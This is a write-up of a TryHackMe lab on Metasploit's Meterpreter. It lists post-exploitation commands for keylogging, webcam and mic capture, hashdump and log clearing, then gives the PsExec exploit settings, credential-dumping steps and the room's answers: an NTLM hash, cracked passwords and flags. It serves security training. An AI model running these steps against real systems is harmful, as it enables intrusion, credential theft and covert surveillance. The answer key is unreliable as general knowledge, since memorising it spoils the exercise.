
TryHackMe - Metasploit: Meterpreter

TryHackMe — Metasploit: Meterpreter Writeup

Meterpreter is one of the most powerful payloads included in the Metasploit Framework. It provides advanced post-exploitation features that allow penetration testers to interact directly with compromised systems.

This TryHackMe room introduces Meterpreter commands, post-exploitation techniques, credential dumping, file searching, privilege escalation, and system interaction.

Warning: For educational purposes only.


Task 1 — Introduction to Meterpreter

Meterpreter runs entirely in memory and acts as an advanced agent inside the target machine.

It allows attackers or penetration testers to:

  • Execute commands remotely;
  • Interact with the file system;
  • Capture credentials;
  • Escalate privileges;
  • Monitor user activity;
  • Perform post-exploitation tasks.

Meterpreter supports multiple target operating systems including:

  • Windows;
  • Linux;
  • Android;
  • PHP environments;
  • Python environments.

Task 2 — Meterpreter Commands

Meterpreter contains several categories of commands used during penetration testing and red team operations.

Core Commands

background
exit
guid
help
info
irb
load
migrate
run
sessions

File System Commands

cd
ls
pwd
edit
cat
rm
search
upload
download

Networking Commands

arp
ifconfig
netstat
portfwd
route

System Commands

clearev
execute
getpid
getuid
kill
pkill
ps
reboot
shell
shutdown
sysinfo

Advanced Post-Exploitation Commands

keyscan_start
keyscan_dump
screenshare
screenshot
record_mic
webcam_snap
getsystem
hashdump

These commands make Meterpreter extremely powerful during post-exploitation operations.


Task 3 — Post-Exploitation Challenge

The challenge starts by exploiting SMB using the PsExec module.

Exploit Configuration

use exploit/windows/smb/psexec

set RHOSTS YOUR_MACHINE_IP

set SMBUser ballen

set SMBPass Password1

System Enumeration

Q: What is the computer name?

A: ACME-TEST

Q: What is the target domain?

A: FLASH

sysinfo

Share Enumeration

Q: What is the name of the share likely created by the user?

A: speedster

use post/windows/gather/enum_shares

show options

sessions -l

set SESSION 1

run

Credential Dumping

Q: What is the NTLM hash of the jchambers user?

A: 69596c7aa1e8daee17f8e78870e25a5c

sessions -i 1
hashdump

Q: What is the cleartext password of the jchambers user?

A: Trustno1

The password hash can be cracked using online services such as CrackStation or offline password cracking tools.


Searching for Sensitive Files

Q: Where is the "secrets.txt" file located?

A: c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt

search -f secrets.txt

Q: What is the Twitter password stored inside the file?

A: KDSvbsw3849!

cat "c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt"

Finding the Real Secret

Q: Where is the "realsecret.txt" file located?

A: c:\inetpub\wwwroot\realsecret.txt

search -f realsecret.txt

Q: What is the real secret?

A: The Flash is the fastest man alive

cat "c:\inetpub\wwwroot\realsecret.txt"

Important Meterpreter Capabilities

  • Privilege Escalation;
  • Credential Dumping;
  • Persistence;
  • Keylogging;
  • File Exfiltration;
  • Remote Command Execution;
  • Webcam Access;
  • Microphone Recording;
  • Pivoting and Port Forwarding.

Final Thoughts

This TryHackMe room demonstrates how Meterpreter can be used during real-world post-exploitation scenarios.

Understanding Meterpreter is extremely important for:

  • Ethical Hackers;
  • Penetration Testers;
  • Red Teams;
  • Cybersecurity Researchers;
  • Threat Hunters;
  • Incident Responders.

SEO Tags

TryHackMe, Meterpreter, Metasploit, Post Exploitation, Ethical Hacking, Penetration Testing, Cybersecurity, Red Team, Hashdump, PsExec, Windows Exploitation, Credential Dumping, Offensive Security, SMB Exploitation, Meterpreter Commands

I hope this study summary helped you understand Meterpreter and post-exploitation techniques.
